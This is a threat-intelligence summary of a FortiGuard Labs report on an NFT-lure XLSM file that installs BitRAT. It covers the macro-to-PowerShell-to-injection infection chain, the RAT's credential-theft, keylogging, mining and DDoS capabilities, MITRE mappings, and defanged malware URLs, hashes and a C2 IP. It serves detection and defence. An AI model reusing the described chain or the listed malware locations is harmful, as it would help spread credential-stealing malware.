FortiGuard Labs details an NFT-themed lure that hides a BitRAT infection in an Excel XLSM file, downloaded via Discord and executed through a malicious macro. The malware chain includes batch and PowerShell steps, a .NET downloader, DLL injection, persistence, and a BitRAT payload with HVNC capabilities and multiple data-theft functions. #BitRAT #HVNC #FranTechSolutions #NFT #Discord
Keypoints
- The XLSM file is named “NFT_Items.xlsm” and contains a Hebrew workbook with NFT-related content, likely targeting NFT enthusiasts in Israel to entice downloads.
- A malicious Excel macro drops a batch file and uses PowerShell to fetch NFTEXE.exe from Discord.
- NFTEXE.exe is a .NET payload that persists, injects into MSBuild.exe via a DLL, and downloads NFTEXE.png (data with reversed strings) from Discord.
- The final payload is BitRAT, a RAT with HVNC, UAC and Windows Defender bypass, screen and webcam monitoring, and other capabilities.
- BitRAT uses Slowloris for DDoS, and operates with infrastructure hosted by a bulletproof provider (FranTech Solutions).
- Fortinet identifies the threat with IO/Network indicators and provides defenses such as FortiGuard Antivirus/EDR detections and WebFiltering IOCs.
<liBitRAT can steal browser/app credentials, mine Monero, log keystrokes, transfer files, and capture microphone input; it also stores data in ADS and rotates logs daily.
MITRE Techniques
- [T1059.005] Visual Basic – The XLSM contains a malicious macro, which the user is asked to enable upon opening the file. “The XLSM contains a malicious macro, which the user is asked to enable upon opening the file.”
- [T1059.001] PowerShell – It then uses a PowerShell script to download another file from Discord, NFTEXE.exe. “It then uses a PowerShell script to download another file from Discord, NFTEXE.exe.”
- [T1105] Ingress Tool Transfer – The PowerShell step downloads NFTEXE.exe from Discord. “download another file from Discord, NFTEXE.exe.”
- [T1027] Obfuscated/Compressed Files and Information – NFTEXE.png is pure data with all its strings flipped. “NFTEXE.png is pure data with all its strings flipped (see Figure 5).”
- [T1055] Process Injection – NFTEXE.exe injects a malicious payload into MSBuild.exe using Nnkngxzwxiuztittiqgz.dll. “injects a malicious payload into the running MSBuild.exe using Nnkngxzwxiuztittiqgz.dll.”
- [T1547.001] Boot or Logon Autostart Execution – NFTEXE.exe copies itself to startup and runs at every boot. “copies itself as C:Users[username]AppDataRoamingMicrosoftWindowsStart MenuProgramsAdobeCloud.exe, which runs at every startup.”
- [T1548.002] UAC Bypass – The sample can bypass User Account Control. “bypass User Account Control (UAC)—a Windows security feature…”
- [T1562.001] Impair Defenses – It can bypass Windows Defender. “and Windows Defender— an anti-malware component…”
- [T1555] Credentials from Password Stores – Stealing credentials from browsers and applications installed on the machine. “Stealing credentials from browsers and applications installed on the compromised machine.”
- [T1496] Resource Hijacking – Mining Monero cryptocurrency. “Mining Monero cryptocurrency.”
- [T1056.001] Keylogging – Logging keystrokes. “Logging keystrokes.”
- [T1499] Endpoint Denial of Service – Slowloris used for DDoS. “Running Slowloris for its DDoS capabilities.”
- [T1583] Acquire Infrastructure – C2 hosted at FranTech Solutions (bulletproof hosting). “The C2 server… belongs to FranTech Solutions, a hosting provider that is known as a bulletproof hosting service provider.”
Indicators of Compromise
- [SHA-256] Sample hashes – 88ef347ad571f74cf1a450d5dad85a097bb29ab9b416357501cdc4c00388f796, 342a5102bc7eedb62d5192f7142ccc7413dc825a3703e818cf32094638ebd17a
- [Network] URLs – hxxps://cdn[.]discordapp.com/attachments/923977279179202600/927289948825079828/NFT_LIST.xlsm, hxxps://cdn[.]discordapp.com/attachments/927290851930013766/927291495604699167/NFT_LIST.xlsm, hxxps://cdn[.]discordapp.com/attachments/923858595353874472/928279600659234826/NFTEXE.EXE
- [Network] IP – 205[.]185[.]118[.]52
Read more: https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat